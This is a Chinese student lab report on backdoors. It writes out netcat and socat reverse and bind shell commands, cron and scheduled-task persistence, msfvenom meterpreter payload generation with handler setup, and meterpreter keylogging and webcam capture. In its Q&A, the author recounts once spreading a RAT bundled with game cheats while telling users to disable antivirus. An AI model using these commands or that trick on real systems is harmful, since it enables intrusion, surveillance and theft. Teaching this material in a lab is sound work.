实践内容

  • 使用netcat和socat、msf-meterpreter等工具获得主机权限,并进行一些恶意行为,如监控摄像头、记录键盘输入、截屏等。

  • 详情见实验指导书

实践过程

netcat

netcat获取主机操作Shell,cron启动

windows获得linux的shell
  • windows平台下利用cmd的ipconfig命令查看到本机的ip地址为172.30.6.204
    20154327 Exp2 后门原理与实践-LMLPHP
  • kali在终端下使用ifconfig命令查看kali的IP地址为172.30.1.193
    20154327 Exp2 后门原理与实践-LMLPHP

  • windows下使用ncat.exe -l -p 4327命令运行ncat.exe监听4327端口。
    20154327 Exp2 后门原理与实践-LMLPHP

  • kali下使用为nc 172.30.6.204(即主机ip) 4327 -e /bin/sh命令连接windows的4327端口。
    20154327 Exp2 后门原理与实践-LMLPHP

  • 连接成功后,我们就可以在windows主机获取kali的信息,如输入ls命令:
    20154327 Exp2 后门原理与实践-LMLPHP

linux获得windows的shell
  • kali下使用nc -l -p 4327命令监听4327端口。
    20154327 Exp2 后门原理与实践-LMLPHP
  • windows下使用ncat.exe -e cmd.exe 172.30.1.193 4327(即kali的IP地址)连接kali的4327端口。
    20154327 Exp2 后门原理与实践-LMLPHP
  • 连接成功后,我们就可以在kali主机获取windows的信息,此时已成功获取windows的shell。
    20154327 Exp2 后门原理与实践-LMLPHP
使用netcat传输数据
  • windows下使用ncat.exe -l -p 4327命令运行ncat.exe监听4327端口。
    20154327 Exp2 后门原理与实践-LMLPHP

  • kali下使用为nc 172.30.6.204(即主机ip) 4327命令连接windows的4327端口。
  • 建立连接后,尝试传输。
    20154327 Exp2 后门原理与实践-LMLPHP
    20154327 Exp2 后门原理与实践-LMLPHP

cron启动
  • windows下使用ncat.exe -l -p 4327命令运行ncat.exe监听4327端口。
    20154327 Exp2 后门原理与实践-LMLPHP

  • kali下使用crontab -e命令,设置一条定时指令,因为现在是22:15,所以我设置成在每小时的第20分钟反向连接windows主机的4327端口。
  • 20 * * * * /bin/netcat 172.30.6.204 4327 -e /bin/sh
    20154327 Exp2 后门原理与实践-LMLPHP
  • 20分时连接成功,成功获得linux的shell,输入ls指令查看。(这里由于我使用的是中文版,所以桌面、文档、下载等均无法正常显示)
    20154327 Exp2 后门原理与实践-LMLPHP

socat

socat获取主机操作Shell, 任务计划启动。

  • windows下在控制面板->管理工具->任务计划程序中新建一个触发器。

20154327 Exp2 后门原理与实践-LMLPHP

20154327 Exp2 后门原理与实践-LMLPHP

  • 再新建一个操作,程序路径选择socat.exe的安装路径,填写参数tcp-listen:4327 exec:cmd.exe,pty,stderr

20154327 Exp2 后门原理与实践-LMLPHP

  • 待重启后,刷新任务,可看到任务已经开始执行。

20154327 Exp2 后门原理与实践-LMLPHP

  • kali下使用socat - tcp:172.30.6.204(即主机ip):4327(端口),此时已成功获取windows的shell。

20154327 Exp2 后门原理与实践-LMLPHP

msf-meterpreter

msf-meterpreter 生成后门,传输到靶机获取shell

  • 在kali下输入命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.1.193 LPORT=4327 -f exe > 20154327.exe 生成一个名为20154327的后门程序

20154327 Exp2 后门原理与实践-LMLPHP

  • 使用netcat将这个后门程序传输到windows主机上。
  • 首先我们在windows下输入ncat.exe -lv 4327 > 20154327.exe

  • 随后在Linux下使用ncat -nv 172.30.6.204 4327 < 20154327.exe命令把文件传送过去

20154327 Exp2 后门原理与实践-LMLPHP

  • 这里在杀毒软件上设置20154327.exe为信任程序,后运行

20154327 Exp2 后门原理与实践-LMLPHP

使用msf获取目标摄像头,进行录屏、键盘记录等操作

  • 首先msf打开监听进程
  • msfconsole //进入msf
  • use exploit/multi/handler //进入handler模式
  • set payload windows/meterpreter/reverse_tcp //设置payload
  • set LHOST 172.30.1.193 //将LHOST设置为LinuxIP地址
  • set LPORT 4327 //设端口为那个4327
  • exploit //MSF开始监听

20154327 Exp2 后门原理与实践-LMLPHP

20154327 Exp2 后门原理与实践-LMLPHP

查看系统信息、获取键盘输入、截获摄像头

  • 系统信息:
    20154327 Exp2 后门原理与实践-LMLPHP
  • 键盘记录:
    20154327 Exp2 后门原理与实践-LMLPHP
  • 摄像头:
    20154327 Exp2 后门原理与实践-LMLPHP
  • 提权:
    20154327 Exp2 后门原理与实践-LMLPHP

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:以前尝试过,将生成好的灰鸽子文件和cf游戏外挂捆绑在一起,然后上传到游戏论坛上,并注明,因为有注入,所以会被误报,关闭杀软运行,等待肉鸡上线。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:如上例所说的捆绑方式,还有将自己设为开机启动,在开机后自动运行,以及伪装文件,将自己伪装成常用软件,等待用户点击。

(3)Meterpreter有哪些给你映像深刻的功能?

答:打开摄像头录拍,平时家里电脑放在桌子上,都是正对着床,以后还是用卫生纸挡住。

(4)如何发现自己有系统有没有被安装后门?

答:查看当前电脑的开机项,检测是否有未知项,查看电脑是否存在异常,例如莫名其妙出现的“全家桶”、cpu硬盘等占用异常。

实验心得与体会

  • 这次实验相比以前的实验显得有趣多了,体会到了网络攻防的乐趣,做到了以前以为只有hacker才能做到的事情,翻看他人的文件、记录他人的密码、利用摄像头进行录拍。再想想之后学会了免杀,就可以绕过安全软件了,不禁有些感叹,只学了几节课,就可以绕过市面上的杀软,入侵到别人的电脑中。可想而知,网上拥有黑客技术并不去约束自己的人应该会很多,信息安全任重道远。
05-15 03:41